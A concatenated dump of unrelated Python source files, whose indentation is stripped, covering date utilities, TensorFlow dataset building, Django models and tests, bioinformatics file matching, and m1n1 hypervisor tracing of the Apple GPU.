_BANK_HOLIDAY_CALENDAR = Calendar(requests.get(config.CONSTANTS["BANK_HOLIDAY_URL"]).text)
for holiday_event in _BANK_HOLIDAY_CALENDAR.events:
holiday_begin = datetime.datetime(year=holiday_event.begin.datetime.year,
month=holiday_event.begin.datetime.month,
day=holiday_event.begin.datetime.day)
holiday_end = datetime.datetime(year=holiday_event.end.datetime.year,
month=holiday_event.end.datetime.month,
day=holiday_event.end.datetime.day)
if date >= holiday_begin and date < holiday_end: # pylint: disable=R1716
return True
return False
def is_today(date: datetime) -> bool:
""" Is date today """
return equals(date, datetime.datetime.now())
def is_turkish_date(date: str) -> bool:
""" Is the given date a Turkish date """
return re.compile(_TURKISH_DATE_REGEX).match(date) is not None
def is_working_day(date: datetime) -> bool:
""" Is the given date a working day """
weekday = date.weekday()
if weekday in (5, 6):
return False
if is_bank_holiday(date):
return False
return True
def parse_json_date(json_date: str) -> datetime:
""" Parses a JSON date """
try:
return datetime.datetime.strptime(json_date, '%Y-%m-%dT%H:%M:%S.%f')
except Exception:
pass
try:
return datetime.datetime.strptime(json_date, '%Y-%m-%dT%H:%M:%S.%fZ')
except Exception:
pass
try:
return datetime.datetime.strptime(json_date, '%Y-%m-%d %H:%M:%S.%f')
except Exception:
pass
try:
return datetime.datetime.strptime(json_date, '%Y-%m-%dT%H:%M:%S')
except Exception:
pass
try:
return datetime.datetime.strptime(json_date, '%Y-%m-%d %H:%M:%S')
except Exception:
pass
return datetime.datetime.strptime(json_date, '%Y-%m-%d')
def parse_sap_date(date: str) -> datetime.datetime:
""" Parse date in SAP format """
year = int(date[0] + date[1] + date[2] + date[3])
month = int(date[4] + date[5])
day = int(date[6] + date[7])
return datetime.datetime(year=year, month=month, day=day)
def parse_turkish_date(date: str) -> datetime.datetime:
""" Parse date in Turkish format """
split_date = date.split(".")
year = int(split_date[2])
month = int(split_date[1])
day = int(split_date[0])
return datetime.datetime(year=year, month=month, day=day)
def _month_has_30_days(month: int) -> bool:
return month in (4, 6, 9, 11)
def _get_last_day_of_month(month: int, year: int) -> int:
if month == 2 and year % 4 == 0:
return 29
if month == 2:
return 28
if _month_has_30_days(month):
return 30
return 31
def _shift_day_to_month(day: int, month: int, year: int) -> int:
last_day_of_month = _get_last_day_of_month(month, year)
if day > last_day_of_month:
return last_day_of_month
return day
|
nilq/baby-python
|
python
|
from .drm import DRM
from .aes_drm import AESDRM
from .playready_drm_additional_information import PlayReadyDRMAdditionalInformation
from .clearkey_drm import ClearKeyDRM
from .fairplay_drm import FairPlayDRM
from .marlin_drm import MarlinDRM
from .playready_drm import PlayReadyDRM
from .primetime_drm import PrimeTimeDRM
from .widevine_drm import WidevineDRM
from .drm_status import DRMStatus
from .cenc_drm import CENCDRM
from .cenc_playready_entry import CENCPlayReadyEntry
from .cenc_widevine_entry import CENCWidevineEntry
from .cenc_marlin_entry import CENCMarlinEntry
from .cenc_fairplay_entry import CENCFairPlayEntry
|
nilq/baby-python
|
python
|
"""ICDAR 2013 table recognition dataset."""
from abc import abstractmethod
import xml.etree.ElementTree as ET
import io
import os
import glob
import pathlib
from itertools import chain
import tensorflow_datasets as tfds
import tensorflow as tf
import pdf2image
import PIL
from table.markup_table import Cell, Table
from utils.rect import Rect
from table.grid_structure import GridStructureBuilder
import split.evaluation
# TODO(ICDAR): Markdown description that will appear on the catalog page.
_DESCRIPTION = """
Description is **formatted** as markdown.
It should also contain any processing which has been applied (if any),
(e.g. corrupted example skipped, images cropped,...):
"""
# TODO(ICDAR): BibTeX citation
_CITATION = """
"""
_FILES_TO_IGNORE = [
['competition-dataset-eu', 'eu-015'], # cells lie outside page rect
['competition-dataset-us', 'us-035a'], # 2nd table has invalid cell coords
['eu-dataset', 'eu-032'], # 2nd table has invalid cell coords
['eu-dataset', 'eu-014'], # invalid cell text rect
['eu-dataset', 'eu-023'], # invalid cell text rect
['us-gov-dataset', 'us-025'], # invalid cell text rect
['us-gov-dataset', 'us-012'], # invalid cell text rect
['us-gov-dataset', 'us-020'], # invalid cell text rect
]
class IcdarBase(tfds.core.GeneratorBasedBuilder):
"""Base DatasetBuilder for ICDAR datasets."""
def _info(self) -> tfds.core.DatasetInfo:
"""Returns the dataset metadata."""
return tfds.core.DatasetInfo(
builder=self,
description=_DESCRIPTION,
features=self._get_features_dict(),
homepage='https://www.tamirhassan.com/html/dataset.html',
citation=_CITATION,
disable_shuffling=True
)
@abstractmethod
def _get_features_dict(self) -> tfds.features.FeaturesDict:
"""Returns features, describing dataset element."""
pass
def _split_generators(self, dl_manager: tfds.download.DownloadManager):
"""Returns SplitGenerators."""
pathes = dl_manager.download_and_extract(
['https://www.tamirhassan.com/html/files/eu-dataset-20130324.zip',
'https://www.tamirhassan.com/html/files/us-gov-dataset-20130324.zip',
'https://www.tamirhassan.com/html/files/icdar2013-competition-dataset-with-gt.zip'])
if not isinstance(pathes, list):
# During unit-testing dl_manager will return path to dummy_data.
return {'train': self._generate_examples(pathes)}
return {
'train': chain(
self._generate_examples(pathes[0]),
self._generate_examples(pathes[1])),
'test': self._generate_examples(pathes[2])
}
def _generate_examples(self, path):
"""Yields examples."""
for pdf_file_path in glob.glob(os.path.join(path, '**/*.pdf'), recursive=True):
pdf_file_path = pathlib.Path(pdf_file_path)
parent_folder_name = pdf_file_path.parts[-2]
stem = pdf_file_path.stem
if [parent_folder_name, stem] in _FILES_TO_IGNORE:
continue
region_file_path = pdf_file_path.with_name(stem + '-reg.xml')
structure_file_path = pdf_file_path.with_name(stem + '-str.xml')
pages = pdf2image.convert_from_path(pdf_file_path, dpi=72)
for page_number, table in self._generate_tables(pages, region_file_path, structure_file_path):
key = '{}-{}-{}'.format(parent_folder_name, stem, table.id)
page = pages[page_number]
table_image = page.crop(table.rect.as_tuple())
yield key, self._get_single_example_dict(table_image, table)
@abstractmethod
def _get_single_example_dict(self, table_image, markup_table):
"""Returns dict with nessary inputs for the model."""
pass
def _generate_tables(self, pages, region_file_path, structure_file_path):
regions_tree = ET.parse(region_file_path)
structures_tree = ET.parse(structure_file_path)
for table_node, table_structure_node in zip(regions_tree.getroot(), structures_tree.getroot()):
table_id = int(table_node.get('id'))
region_node = table_node.find('region')
page_number = int(region_node.get('page')) - 1
page_width, page_height = pages[page_number].size
table_rect = self._get_bounding_box(page_width, page_height, region_node)
cells_node = table_structure_node.find('region')
cells = [self._get_cell(page_width, page_height, node) for node in cells_node]
yield page_number, Table(table_id, table_rect, cells)
def _get_bounding_box(self, page_width, page_height, xml_node):
bounding_box_node = xml_node.find('bounding-box')
left = self._to_int(bounding_box_node.get('x1'))
top = page_height - self._to_int(bounding_box_node.get('y2'))
right = self._to_int(bounding_box_node.get('x2'))
bottom = page_height - self._to_int(bounding_box_node.get('y1'))
assert 0 <= left and left < right and right <= page_width
assert 0 <= top and top < bottom and bottom <= page_height
return Rect(left, top, right, bottom)
def _to_int(self, str):
result = str.replace('ß', '6')
return int(result)
def _get_cell(self, page_width, page_height, xml_node):
text_rect = self._get_bounding_box(page_width, page_height, xml_node)
col_start = int(xml_node.get('start-col'))
col_end = int(xml_node.get('end-col', col_start))
row_start = int(xml_node.get('start-row'))
row_end = int(xml_node.get('end-row', row_start))
assert col_start <= col_end and row_start <= row_end
grid_rect = Rect(col_start, row_start, col_end + 1, row_end + 1)
return Cell(text_rect, grid_rect)
def _image_to_byte_array(self, image):
imgByteArr = io.BytesIO()
image.save(imgByteArr, format='png')
imgByteArr = imgByteArr.getvalue()
return imgByteArr
class IcdarSplit(IcdarBase):
"""DatasetBuilder for training SPLIT model."""
VERSION = tfds.core.Version('1.0.1')
RELEASE_NOTES = {
'1.0.0': 'Initial release.',
'1.0.1': 'Generate markup table.'
}
def _get_features_dict(self):
return tfds.features.FeaturesDict({
'image': tfds.features.Image(shape=(None, None, 3)),
'horz_split_points_mask': tfds.features.Tensor(shape=(None,), dtype=tf.bool),
'vert_split_points_mask': tfds.features.Tensor(shape=(None,), dtype=tf.bool),
# Ground truth table
'markup_table': tfds.features.Tensor(shape=(), dtype=tf.string)
})
def _get_single_example_dict(self, table_image, markup_table):
"""Returns dict with nessary inputs for the model."""
horz_split_points_mask = markup_table.create_horz_split_points_mask()
vert_split_points_mask = markup_table.create_vert_split_points_mask()
return {
'image': self._image_to_byte_array(table_image),
'horz_split_points_mask': horz_split_points_mask,
'vert_split_points_mask': vert_split_points_mask,
'markup_table': markup_table.to_tensor().numpy()
}
class IcdarMerge(IcdarBase):
"""DatasetBuilder for training MERGE model."""
VERSION = tfds.core.Version('1.0.1')
RELEASE_NOTES = {
'1.0.0': 'Initial release.',
'1.0.1': 'Generate markup table.'
}
def __init__(self, split_checkpoint_path='checkpoints/split_icdar.ckpt', **kwargs):
super().__init__(**kwargs)
self._split_checkpoint_path = split_checkpoint_path
# Lazy initialization
self._split_model = None
def _get_features_dict(self):
return tfds.features.FeaturesDict({
'image': tfds.features.Image(shape=(None, None, 3)),
# SPLIT model outputs
'horz_split_points_probs': tfds.features.Tensor(shape=(None,), dtype=tf.float32),
'vert_split_points_probs': tfds.features.Tensor(shape=(None,), dtype=tf.float32),
'horz_split_points_binary': tfds.features.Tensor(shape=(None,), dtype=tf.int32),
'vert_split_points_binary': tfds.features.Tensor(shape=(None,), dtype=tf.int32),
# Ground truth masks
'merge_right_mask': tfds.features.Tensor(shape=(None, None), dtype=tf.bool, encoding='zlib'),
'merge_down_mask': tfds.features.Tensor(shape=(None, None), dtype=tf.bool, encoding='zlib'),
# Ground truth table
'markup_table': tfds.features.Tensor(shape=(), dtype=tf.string)
})
def _get_single_example_dict(self, table_image, markup_table):
"""Returns dict with nessary inputs for the model."""
h_probs, v_probs, h_binary, v_binary = self._get_split_model_outputs(table_image)
grid = GridStructureBuilder(markup_table.rect, h_binary, v_binary).build()
merge_right_mask, merge_down_mask = markup_table.create_merge_masks(grid)
return {
'image': self._image_to_byte_array(table_image),
'horz_split_points_probs': h_probs,
'vert_split_points_probs': v_probs,
'horz_split_points_binary': h_binary,
'vert_split_points_binary': v_binary,
'merge_right_mask': merge_right_mask,
'merge_down_mask': merge_down_mask,
'markup_table': markup_table.to_tensor().numpy()
}
def _get_split_model_outputs(self, table_image):
table_image_array = tf.keras.utils.img_to_array(
table_image, data_format='channels_last', dtype='uint8')
table_image_tensor = tf.convert_to_tensor(table_image_array, dtype='uint8')
table_image_tensor = tf.expand_dims(table_image_tensor, axis=0)
outputs_dict = self._get_split_model()(table_image_tensor)
keys_of_interest = [
'horz_split_points_probs3',
'vert_split_points_probs3',
'horz_split_points_binary',
'vert_split_points_binary'
]
return tuple(
tf.squeeze(outputs_dict[key], axis=0).numpy() for key in keys_of_interest
)
def _get_split_model(self):
if self._split_model is not None:
return self._split_model
assert tf.io.gfile.exists(self._split_checkpoint_path)
model = split.evaluation.load_model(self._split_checkpoint_path, False)
self._split_model = model
return model
|
nilq/baby-python
|
python
|
import re
import csv
from collections import defaultdict
from csv import DictReader
###########################################################
## TEST
def print_sammler(filename):
with open(filename) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
print(row['errolename'], row['erglobalid'],"\n")
def print_people(filename):
with open(filename) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
print(row['uid'], row['cn'])
def read_people(filename):
ret = {}
with open(filename) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
ret[row['uid']] = { 'UID' : row['uid'] , 'NAME' : row['cn'] , 'ROLES' : row['erroles'] }
return ret
def read_roles(filename):
ret = {}
with open(filename) as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
ret[row['erglobalid']] = { 'NAME' : row['errolename'] }
return ret
def print_roles(person, rolecache):
roles = person['ROLES']
ra = roles.split('|')
for i in ra:
# print (i[11:38])
res = re.search("^erglobalid=(.*),(.*)$",i[:38])
roleId = res.group(1)
while True:
try:
sammler = rolecache[roleId]
print(" RoleID: ", roleId, " - ", sammler['NAME'])
break
except:
break
def print_all(personcache, rolecache):
ret = {}
for person in personcache.items():
print(personcache[person[0]]['UID'], " - ", personcache[person[0]]['NAME'])
roles = personcache[person[0]]['ROLES']
ra = roles.split('|')
for i in ra:
# print (i[11:38])
res = re.search("^erglobalid=(.*),(.*)$",i[:38])
roleId = res.group(1)
while True:
try:
sammler = rolecache[roleId]
print(" RoleID: ", roleId, " - ", sammler['NAME'])
ret[roleId] = { 'ROLEID' : roleId , 'NAME' : sammler['NAME'] }
break
except:
break
return ret
###########################################################
## TEST
def parse_csv(filename, fieldnames=None, delimiter=','):
result = defaultdict(list)
with open(filename) as infile:
reader = DictReader(
infile, fieldnames=fieldnames, delimiter=delimiter
)
for row in reader:
for fieldname, value in row.items():
result[fieldname].append(value)
return result
###########################################################
## MAIN
roles = read_roles("in1.TXT")
peoples = read_people("in2.TXT")
# print(peoples['suchtext'])
# print(peoples['suchtext']['NAME'])
# print_sammler("in2.TXT")
# print(peoples['suchtext'])
ret = print_all(peoples, roles)
for i in ret:
print(ret[i]['ROLEID'], ";",ret[i]['NAME'])
# for p in peoples.items():
# print(p)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# Just a program/module that print hello
# Gleydson Mazioli da Silva <gleydsonmazioli@gmail.com>
def my_func():
print 'hello'
if __name__ == "__main__":
my_func()
|
nilq/baby-python
|
python
|
"""Django ORM models for Social Auth"""
import six
from django.db import models
from django.conf import settings
from django.db.utils import IntegrityError
from social.utils import setting_name
from social.storage.django_orm import DjangoUserMixin, \
DjangoAssociationMixin, \
DjangoNonceMixin, \
DjangoCodeMixin, \
BaseDjangoStorage
from social.apps.django_app.default.fields import JSONField
from social.apps.django_app.default.managers import UserSocialAuthManager
USER_MODEL = getattr(settings, setting_name('USER_MODEL'), None) or \
getattr(settings, 'AUTH_USER_MODEL', None) or \
'auth.User'
UID_LENGTH = getattr(settings, setting_name('UID_LENGTH'), 255)
NONCE_SERVER_URL_LENGTH = getattr(
settings, setting_name('NONCE_SERVER_URL_LENGTH'), 255)
ASSOCIATION_SERVER_URL_LENGTH = getattr(
settings, setting_name('ASSOCIATION_SERVER_URL_LENGTH'), 255)
ASSOCIATION_HANDLE_LENGTH = getattr(
settings, setting_name('ASSOCIATION_HANDLE_LENGTH'), 255)
class AbstractUserSocialAuth(models.Model, DjangoUserMixin):
"""Abstract Social Auth association model"""
user = models.ForeignKey(USER_MODEL, related_name='social_auth')
provider = models.CharField(max_length=32)
uid = models.CharField(max_length=UID_LENGTH)
extra_data = JSONField()
objects = UserSocialAuthManager()
def __str__(self):
return str(self.user)
class Meta:
abstract = True
@classmethod
def get_social_auth(cls, provider, uid):
try:
return cls.objects.select_related('user').get(provider=provider,
uid=uid)
except UserSocialAuth.DoesNotExist:
return None
@classmethod
def username_max_length(cls):
username_field = cls.username_field()
field = UserSocialAuth.user_model()._meta.get_field(username_field)
return field.max_length
@classmethod
def user_model(cls):
user_model = UserSocialAuth._meta.get_field('user').rel.to
if isinstance(user_model, six.string_types):
app_label, model_name = user_model.split('.')
return models.get_model(app_label, model_name)
return user_model
class UserSocialAuth(AbstractUserSocialAuth):
"""Social Auth association model"""
class Meta:
"""Meta data"""
unique_together = ('provider', 'uid')
db_table = 'social_auth_usersocialauth'
class Nonce(models.Model, DjangoNonceMixin):
"""One use numbers"""
server_url = models.CharField(max_length=NONCE_SERVER_URL_LENGTH)
timestamp = models.IntegerField()
salt = models.CharField(max_length=65)
class Meta:
unique_together = ('server_url', 'timestamp', 'salt')
db_table = 'social_auth_nonce'
class Association(models.Model, DjangoAssociationMixin):
"""OpenId account association"""
server_url = models.CharField(max_length=ASSOCIATION_SERVER_URL_LENGTH)
handle = models.CharField(max_length=ASSOCIATION_HANDLE_LENGTH)
secret = models.CharField(max_length=255) # Stored base64 encoded
issued = models.IntegerField()
lifetime = models.IntegerField()
assoc_type = models.CharField(max_length=64)
class Meta:
db_table = 'social_auth_association'
class Code(models.Model, DjangoCodeMixin):
email = models.EmailField(max_length=254)
code = models.CharField(max_length=32, db_index=True)
verified = models.BooleanField(default=False)
class Meta:
db_table = 'social_auth_code'
unique_together = ('email', 'code')
class DjangoStorage(BaseDjangoStorage):
user = UserSocialAuth
nonce = Nonce
association = Association
code = Code
@classmethod
def is_integrity_error(cls, exception):
return exception.__class__ is IntegrityError
|
nilq/baby-python
|
python
|
#! python
# A small program to match either a fasta or qual file based on whether the barcode was found or not.
# Need a group file that designates sequences without a recognized barcode as "none".
# To use the program entries should look like the following:
# python matchFastaGroup.py <fastaORqualFile> <groupFilew> <outputfileName.fasta> <thingToAdd>
# Need to add a component that incorporates new mapfile into the workflow
# Load the needed modules for the program
import sys, re
# Read in a Command arguments for files to match
# Input other instructions from here
def commandLine():
commands = sys.argv
fastafile = commands[1]
groupfile = commands[2]
outputfile = commands[3]
addition = commands[4]
return fastafile, groupfile, outputfile, addition
# Read in data and create dictionary
def makeDataArray(inputfile, type):
inputfile = open(inputfile, 'r')
if type == "fasta":
print("Reading in Fasta file.....")
# Create specific environment variables
x = 1
names = []
sequence = []
DataDict = {}
# Read data in and create a dictionary
for line in inputfile:
if x%2 != 0:
newLine = re.sub('>', '', line)
names.append(newLine.strip('\t\n'))
else:
sequence.append(line.strip('\n'))
x = x + 1
inputfile.close()
for i, seqName in enumerate(names):
DataDict[seqName] = sequence[i]
# deal with data that is a group file
elif type == "group":
print("Reading in group file......")
DataDict = {}
for line in inputfile:
seqName, group = line.split('\t')
DataDict[seqName] = group.strip('\n')
# deal with data that is a map file
else:
DataDict = {}
for line in inputfile:
number, seqname = line.split('\t')
DataDict[number] = seqname.strip('\n')
return DataDict
def makeNewFasta(fastaDict, addition, outputfile):
outfile = open(outputfile, 'w')
print("Creating new fasta file......")
for i in fastaDict:
sequence = fastaDict[i]
print(">{0}_{1}\n{2}".format(i, addition, sequence), end ='\n', file = outfile)
outfile.close()
# Make a new group file based on the groups not labelled with "none"
def makeNewGroups(groupDict, addition, outputfile):
NewOuputfile = re.sub('.fasta', '.groups', outputfile)
outfile = open(NewOuputfile, 'w')
print("Creating new group file.......")
for i in groupDict:
group = groupDict[i]
print("{0}_{1}\t{2}".format(i, addition, group), end ='\n', file = outfile)
outfile.close()
# Run the actual program
def main():
fastafile, groupfile, outputfile, addition = commandLine()
fastaDict = makeDataArray(fastafile, "fasta")
groupDict = makeDataArray(groupfile, "group")
makeNewFasta(fastaDict, addition, outputfile)
makeNewGroups(groupDict, addition, outputfile)
print("Complete")
if __name__ == '__main__': main()
|
nilq/baby-python
|
python
|
n=int(input())
p=sorted([int(input()) for i in range(n)])
print(p[-1]//2+sum(p[:-1]))
|
nilq/baby-python
|
python
|
import datetime
from django.test import TestCase
from django.db import IntegrityError
from django.contrib.auth.models import User
from django.conf import settings
from rest_framework.authtoken.models import Token
from organizations.models import Organization, Unit
from employees.models import EmployeeGrade, UserData
from hours.models import (
ReportingPeriod,
Timecard,
TimecardObject
)
from projects.models import Project
class EmployeeGradeTests(TestCase):
fixtures = ['tock/fixtures/prod_user.json']
def setUp(self):
self.employeegrade = EmployeeGrade.objects.create(
employee=User.objects.get(pk=1),
grade=8,
g_start_date=datetime.date.today()
)
def test_unique_with_g_start_date(self):
"""Check that multiple EmployeeGrade objects with the same g_start_date
cannot be saved for the same employee."""
with self.assertRaises(IntegrityError):
EmployeeGrade.objects.create(
employee=User.objects.get(pk=1),
grade=9,
g_start_date=datetime.date.today()
)
def test_string_method(self):
"""Check that string method override works correctly."""
expected_string = '{0} - {1} (Starting: {2})'.format(
self.employeegrade.employee,
self.employeegrade.grade,
self.employeegrade.g_start_date
)
self.assertEqual(expected_string, str(self.employeegrade))
class UserDataTests(TestCase):
fixtures = ['projects/fixtures/projects.json']
def setUp(self):
# Create regular_user.
self.regular_user = User.objects.create(
username='brian.whittaker',
is_superuser=True,
is_staff=True,
is_active=True
)
self.inactive_user = User.objects.create(
username='aaron.snow',
is_superuser=True,
is_staff=True,
is_active=False
)
# Create Organization.
self.regular_user_org = Organization.objects.create(
name='18F',
description='18F',
active=True
)
# Create Unit.
self.regular_user_unit = Unit.objects.create(
name='Engineering',
description='18F Engineering Chapter',
org=self.regular_user_org,
active=True
)
# Create UserData object related to regular_user.
self.regular_user_userdata = UserData.objects.create(
user=self.regular_user,
start_date= datetime.date(2014, 1, 1),
end_date=datetime.date(2100, 1, 1),
current_employee=True,
organization=self.regular_user_org,
unit=self.regular_user_unit
)
self.inactive_user_userdata = UserData.objects.create(
user=self.inactive_user,
start_date= datetime.date(2014, 1, 1),
end_date=datetime.date(2100, 1, 1),
current_employee=True,
organization=self.regular_user_org,
unit=self.regular_user_unit
)
# Create a sample reporting period
self.reporting_period = ReportingPeriod.objects.create(
start_date=datetime.date(2015, 1, 1),
end_date=datetime.date(2015, 1, 7),
exact_working_hours=40,
min_working_hours=40,
max_working_hours=60,
message='This is not a vacation'
)
# Create API token for regular_user.
self.token = Token.objects.create(user=self.regular_user)
def test_string_method(self):
"""Check that string method override works correctly."""
userdata = self.regular_user_userdata
expected_string = str(userdata.user.username)
self.assertEqual(expected_string, str(userdata))
def test_user_data_is_stored(self):
""" Check that user data was stored correctly """
userdata = self.regular_user_userdata
self.assertEqual(
userdata.start_date,
datetime.date(2014, 1, 1)
)
self.assertEqual(
userdata.end_date,
datetime.date(2100, 1, 1)
)
self.assertEqual(userdata.unit, self.regular_user_unit)
def test_is_late(self):
""" Check if the user is late when no Timecard is present """
userdata = self.regular_user_userdata
self.assertEqual(userdata.is_late, True)
# Now set to false and re-check:
userdata.billable_expectation = 0
userdata.save()
self.assertEqual(userdata.is_late, False)
def test_is_active(self):
userdata = self.regular_user_userdata
self.assertEqual(userdata.is_active, True)
userdata = self.inactive_user_userdata
self.assertEqual(userdata.is_active, False)
def test_organization_name(self):
"""
Check to see if we can get organization name and unit correctly.
And that the organization_name shortcut matches
the name from the relationship.
"""
userdata = self.regular_user_userdata
self.assertEqual(userdata.organization.name, '18F')
self.assertEqual(userdata.unit.name, 'Engineering')
def test_organization_name_empty(self):
""" Check to see if we can get empty organization name"""
# Create regular_user.
user1 = User.objects.create(
username='john.doe',
is_superuser=True,
is_staff=True,
is_active=True
)
# Create UserData object related to regular_user.
userdata1 = UserData.objects.create(
user=user1,
start_date= datetime.date(2014, 1, 1),
end_date=datetime.date(2100, 1, 1),
unit=self.regular_user_unit,
current_employee=True
)
self.assertEqual(userdata1.organization_name, '')
def test_is_not_late(self):
""" Check if the user is not late when Timecard is present """
userdata = self.regular_user_userdata
timecard = Timecard.objects.create(
user=self.regular_user,
reporting_period=self.reporting_period,
submitted=True
)
project = Project.objects.get(name="Platform as a Service")
TimecardObject.objects.create(
timecard=timecard,
project=project,
hours_spent=40)
self.assertEqual(userdata.is_late, False)
def test_employee_active(self):
""" Check that the save() method correctly aligns UserData and User
attributes when current_employee is True."""
user = self.regular_user
user.is_active = False
user.save()
status_before_save = user.is_active
self.regular_user_userdata.current_employee = True
self.regular_user_userdata.save()
# now re-get the user object so we can see if the status
# changed when userdata changed.
status_after_save = User.objects.get(
username=self.regular_user.username).is_active
self.assertNotEqual(status_before_save, status_after_save)
def test_token_is_delete_on_active_is_false(self):
""" Verify that any tokens associated with a user are deleted when that
user is marked as not active. """
token_before_save = self.token
userdata = UserData.objects.first()
userdata.current_employee = False
userdata.save()
try:
token_after_save = Token.objects.get(user=self.regular_user)
except Token.DoesNotExist:
token_after_save = None
self.assertNotEqual(token_before_save, token_after_save)
def test_is_18f_employee_false_if_no_org(self):
"""False if no org or not named 18F"""
self.regular_user_userdata.organization = None
self.regular_user_userdata.save()
self.assertFalse(self.regular_user_userdata.is_18f_employee)
def test_is_18f_employee_false_if_not_18f(self):
"""False if org not named 18F"""
not_18f = Organization.objects.create(
name='not_18f',
description='not_18f',
active=True
)
self.regular_user_userdata.organization = not_18f
self.regular_user_userdata.save()
self.assertFalse(self.regular_user_userdata.is_18f_employee)
def test_is_18f_employee_true_if_18f(self):
"""True if org is named 18F"""
# Org for `UserData` here defined in UserDataTests.setUp
self.assertTrue(self.regular_user_userdata.is_18f_employee)
def test_billable_expectation(self):
self.regular_user_userdata.expected_billable_hours = 30
expected = 30 / settings.HOURS_IN_A_REGULAR_WORK_WEEK
self.assertEqual(self.regular_user_userdata.billable_expectation, expected)
def test_display_name_if_no_full_name(self):
expected = self.regular_user.username
self.assertEqual(self.regular_user_userdata.display_name, expected)
def test_display_name_if_full_name(self):
self.regular_user.first_name = 'Hank'
self.regular_user.last_name = 'Venture'
expected = self.regular_user.get_full_name()
self.assertEqual(self.regular_user_userdata.display_name, expected)
|
nilq/baby-python
|
python
|
# SPDX-License-Identifier: MIT
import datetime
from m1n1.constructutils import show_struct_trace
from m1n1.utils import *
trace_device("/arm-io/sgx", False)
trace_device("/arm-io/pmp", False)
trace_device("/arm-io/gfx-asc", False)
from m1n1.trace.agx import AGXTracer
AGXTracer = AGXTracer._reloadcls(True)
agx_tracer = AGXTracer(hv, "/arm-io/gfx-asc", verbose=1)
agx_tracer.start()
def resume_tracing(ctx):
fname = f"{datetime.datetime.now().isoformat()}.log"
hv.set_logfile(open(f"gfxlogs/{fname}", "a"))
agx_tracer.resume()
return True
def pause_tracing(ctx):
agx_tracer.pause()
hv.set_logfile(None)
return True
hv.add_hvcall(100, resume_tracing)
hv.add_hvcall(101, pause_tracing)
mode = TraceMode.OFF
trace_range(irange(agx_tracer.gpu_region, agx_tracer.gpu_region_size), mode=mode, name="gpu_region")
trace_range(irange(agx_tracer.gfx_shared_region, agx_tracer.gfx_shared_region_size), mode=mode, name="gfx_shared_region")
trace_range(irange(agx_tracer.gfx_handoff, agx_tracer.gfx_handoff_size), mode=mode, name="gfx_handoff")
## Trace the entire mmio range around the GPU
node = hv.adt["/arm-io/sgx"]
addr, size = node.get_reg(0)
#hv.trace_range(irange(addr, 0x1000000), TraceMode.SYNC, name="sgx")
hv.trace_range(irange(addr, 0x1000000), TraceMode.OFF, name="sgx")
hv.trace_range(irange(0x204017030, 8), TraceMode.SYNC, name="faultcode")
def trace_all_gfx_io():
# These are all the IO ranges that get mapped into the UAT iommu pagetable
# Trace them so we can see if any of them are being written by the CPU
# page (8): fa010020000 ... fa010023fff -> 000000020e100000 [8000020e100447]
hv.trace_range(irange(0x20e100000, 0x4000), mode=TraceMode.SYNC)
# page (10): fa010028000 ... fa01002bfff -> 000000028e104000 [c000028e104447]
hv.trace_range(irange(0x20e100000, 0x4000), mode=TraceMode.SYNC)
# page (22): fa010058000 ... fa01005bfff -> 000000028e494000 [8000028e494447]
hv.trace_range(irange(0x28e494000, 0x4000), mode=TraceMode.SYNC)
# page (28): fa010070000 ... fa010073fff -> 0000000204d60000 [c0000204d60447]
hv.trace_range(irange(0x204d60000, 0x4000), mode=TraceMode.SYNC)
# page (30): fa010078000 ... fa01007bfff -> 0000000200000000 [c0000200000447]
# to
# page (83): fa01014c000 ... fa01014ffff -> 00000002000d4000 [c00002000d4447]
hv.trace_range(irange(0x200000000, 0xd5000), mode=TraceMode.SYNC)
# page (84): fa010150000 ... fa010153fff -> 0000000201000000 [c0000201000447]
#page (137): fa010224000 ... fa010227fff -> 00000002010d4000 [c00002010d4447]
hv.trace_range(irange(0x201000000, 0xd5000), mode=TraceMode.SYNC)
# page (138): fa010228000 ... fa01022bfff -> 0000000202000000 [c0000202000447]
# page (191): fa0102fc000 ... fa0102fffff -> 00000002020d4000 [c00002020d4447]
hv.trace_range(irange(0x202000000, 0xd5000), mode=TraceMode.SYNC)
# page (192): fa010300000 ... fa010303fff -> 0000000203000000 [c0000203000447]
hv.trace_range(irange(0x203000000, 0xd5000), mode=TraceMode.SYNC)
hv.trace_range(irange(0x204000000, 0xd5000), mode=TraceMode.SYNC)
hv.trace_range(irange(0x205000000, 0xd5000), mode=TraceMode.SYNC)
hv.trace_range(irange(0x206000000, 0xd5000), mode=TraceMode.SYNC)
hv.trace_range(irange(0x207000000, 0xd5000), mode=TraceMode.SYNC)
# page (464): fa010740000 ... fa010743fff -> 00000002643c4000 [c00002643c4447]
hv.trace_range(irange(0x2643c4000, 0x4000), mode=TraceMode.SYNC)
# page (466): fa010748000 ... fa01074bfff -> 000000028e3d0000 [c000028e3d0447]
hv.trace_range(irange(0x28e3d0000, 0x4000), mode=TraceMode.SYNC)
# page (468): fa010750000 ... fa010753fff -> 000000028e3c0000 [8000028e3c0447]
hv.trace_range(irange(0x28e3c0000, 0x4000), mode=TraceMode.SYNC)
# page (8): f9100020000 ... f9100023fff -> 0000000406000000 [60000406000447]
# page (263): f910041c000 ... f910041ffff -> 00000004063fc000 [600004063fc447]
hv.trace_range(irange(0x2643c4000, 0x63fc000), mode=TraceMode.SYNC)
def trace_gpu_irqs():
# Trace sgx interrupts
node = hv.adt["/arm-io/sgx"]
for irq in getattr(node, "interrupts"):
hv.trace_irq(f"{node.name} {irq}", irq, 1, hv.IRQTRACE_IRQ)
# Trace gfx-asc interrupts
node = hv.adt["/arm-io/gfx-asc"]
for irq in getattr(node, "interrupts"):
hv.trace_irq(f"{node.name} {irq}", irq, 1, hv.IRQTRACE_IRQ)
|
nilq/baby-python
|
python
|
import setuptools
setuptools.setup(
name="livemelee",
version="0.3.0",
author="Justin Wong",
author_email="jkwongfl@yahoo.com",
description="An easier way to develop a SSBM bot. Built off libmelee.",
long_description=open('README.md', 'r').read(),
long_description_content_type="text/markdown",
url="https://github.com/wong-justin/melee-bot",
packages=setuptools.find_packages(),
install_requires=[
'melee',
],
python_requires='>=3.7',
keywords=['melee', 'smash bros', 'slippi'],
# for documentation.md:
# setup_requires=['setuptools_git', 'setuptools_scm'],
package_data={'': ['documentation.md']},
include_package_data=True,
)
|
nilq/baby-python
|
python
|
from lxml import etree
from ..https import Methods
from ..objects.base import remove_xmlns
class Request(object):
def __init__(self, path, headers, params, map_method, data=None, method=None):
self.path = path
self.headers = headers
self.params = params
